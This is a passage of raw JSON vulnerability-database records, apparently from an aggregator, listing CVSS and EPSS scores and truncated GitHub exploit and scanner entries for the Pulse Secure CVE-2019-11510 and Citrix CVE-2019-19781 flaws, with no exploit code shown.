["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "seebug", "idList": ["SSV:97207"]}, {"type": "symantec", "idList": ["SMNTC-111238"]}, {"type": "talosblog", "idList": ["TALOSBLOG:2401133934B407D6B7E1C6D91E886EBA", "TALOSBLOG:25506C78BB084870681BE9F9E1357045", "TALOSBLOG:30A0CC27D6C35FC08DF198CA0AA9C626", "TALOSBLOG:5757EE09BE22E4808719C348402D3F43", "TALOSBLOG:71D138211697B43CB345A133B54BC824", "TALOSBLOG:97F975C073505AE88655FF1C539740A6", "TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8", "TALOSBLOG:AB5E63755953149993334997F5123794", "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:F5BDBD830CCBBD67980916B9F246B878"]}, {"type": "thn", "idList": ["THN:1BA2E3EE721856ECEE43B825656909B0", "THN:3D0ED27488E8AFC91D99882663F7E35A", "THN:42A0EFDB5165477E18333E9EE1A81D8E", "THN:46994B7A671ED65AD9975F25F514C6E3", "THN:65DE53134A31AE62D9634C0B4AA4E81B", "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "THN:8E5D44939B2B2FF0156F7FF2D4802857", "THN:B0F0C0035DAAFA1EC62F15464A80677E", "THN:F03064A70C65D9BD62A8F5898BA276D2", "THN:F8EDB5227B5DA0E4B49064C2972A193D"]}, {"type": "threatpost", "idList": ["THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "THREATPOST:157F244C629A1657480AFA561FF77BE4", "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:26EF81FADB8E1A92908C782EBBDB8C88", "THREATPOST:3D545239C6AE58821904FBF3069CB365", "THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:4D733D952DD37D57DDA47C16AEAAE1FA", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:85363E24CAB31CC66B298BC023E9CF95", "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8", "THREATPOST:E1CCA676B9815B84D887370ABFDEE020"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:342FB0D457FCA0DA93C711A150B5CAE2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-7600"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:115E09DAC149F2CA9466BA7550E0A5FE"]}, {"type": "zdi", "idList": ["ZDI-19-181"]}, {"type": "zdt", "idList": ["1337DAY-ID-30171", "1337DAY-ID-30199", "1337DAY-ID-30200", "1337DAY-ID-30268", "1337DAY-ID-32826"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2018-7600", "epss": "0.975790000", "percentile": "0.999980000", "modified": "2023-03-15"}, {"cve": "CVE-2019-0604", "epss": "0.974900000", "percentile": "0.999440000", "modified": "2023-03-16"}, {"cve": "CVE-2019-0708", "epss": "0.975180000", "percentile": "0.999690000", "modified": "2023-03-15"}, {"cve": "CVE-2019-11510", "epss": "0.975040000", "percentile": "0.999580000", "modified": "2023-03-15"}, {"cve": "CVE-2019-19781", "epss": "0.975420000", "percentile": "0.999870000", "modified": "2023-03-15"}], "vulnersScore": 1.1}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1659984668, "epss": 1679000794}, "_internal": {"score_hash": "de4bf38a326add20172775a2a9197444"}}

{"githubexploit": [{"lastseen": "2022-03-06T10:03:57", "description": "# check-your-pulse #\n\n[![GitHub Build Status](https://github.com...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-04-16T16:32:47", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781"], "modified": "2022-03-06T07:12:20", "id": "62891769-2887-58A7-A603-BCD5E6A6D6F9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-10T18:30:15", "description": "# pwn-pulse.sh\n**Exploit for Pulse Connect Secure SSL VPN arbitr...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-09-09T15:58:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2022-07-10T18:18:14", "id": "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T09:34:30", "description": "# CVE-2019-11510\nExploit for Arbitrary File Read on Pulse Secure...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-08-21T08:40:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2022-08-17T05:58:09", "id": "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:06", "description": "# pulsexploit\nAutomated script for Pulse Secure SSL VPN exploit ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-07-27T15:06:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-12-13T12:56:51", "id": "059DC199-E425-50EE-B5F5-E351E0323E69", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:17:27", "description": "# CVE-2019-11510-1\n\n## Exploit for Arbitrary File Read on...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-08-27T09:21:10", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-12-05T21:57:04", "id": "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-12T06:25:19", "description": "SUMMARY\n-------\nSimple NSE script to detect Pulse Secure SSL VPN...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-08-27T03:04:19", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2022-07-12T05:49:07", "id": "765DCAD5-2789-5451-BBFA-FAD691719F7A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:17:31", "description": "# CVE-2019-11510 PoC\n\nPython script to explo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-08-26T23:30:15", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-12-05T21:57:04", "id": "77912E98-768B-5AF5-AE06-1F42C6D88F72", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-22T18:22:40", "description": "# CVE-2019-11510-poc\nPulse Secure SSL VPN pre-auth file reading...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-08-22T08:18:19", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2022-06-22T14:31:19", "id": "DC044D23-6D59-5326-AB78-94633F024A74", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:17:45", "description": "Hi this is script to check IP address from shodan that vul...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-08-21T12:03:14", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-10-19T12:40:24", "id": "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:30:50", "description": "# pulsexploit\nAutomated script for Pulse Secure SSL VPN exploit ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-12-07T17:09:24", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-12-05T21:57:04", "id": "31DB22CD-3492-524F-9D26-035FC1086A71", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T13:54:43", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-17T17:53:56", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-11-05T21:41:20", "id": "00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-18T03:41:51", "description": "# CVE-2019-19781-Forensic\n\n## Note : My advice is now to use the...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-15T20:43:37", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-02-18T00:29:46", "id": "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:30", "description": "# ADC-19781\nSeveral checks for CVE-2019-19781\n\n\n## Module instal...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-16T12:33:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-08-15T04:34:45", "id": "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:27", "description": "# CVE-2019-19781 \n\nTo use this scanner goto https://cve-2019-197...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T21:54:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-28T22:56:43", "id": "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:48", "description": "# CVE-2019-19781\nJust a python3 CVE-2019-19781 exploit for Citri...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-28T12:09:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-28T21:23:04", "id": "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:28", "description": "Based on a **Splunk** perspective.\nBelow resources show that ing...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-23T08:41:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-24T10:45:10", "id": "607F0EF9-B234-570A-9E89-A73FBE248E6F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-11T09:14:12", "description": "# Citrix ADC (NetScaler) Honeypot\n- Detects and logs payloads fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-22T13:00:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-05-11T04:52:56", "id": 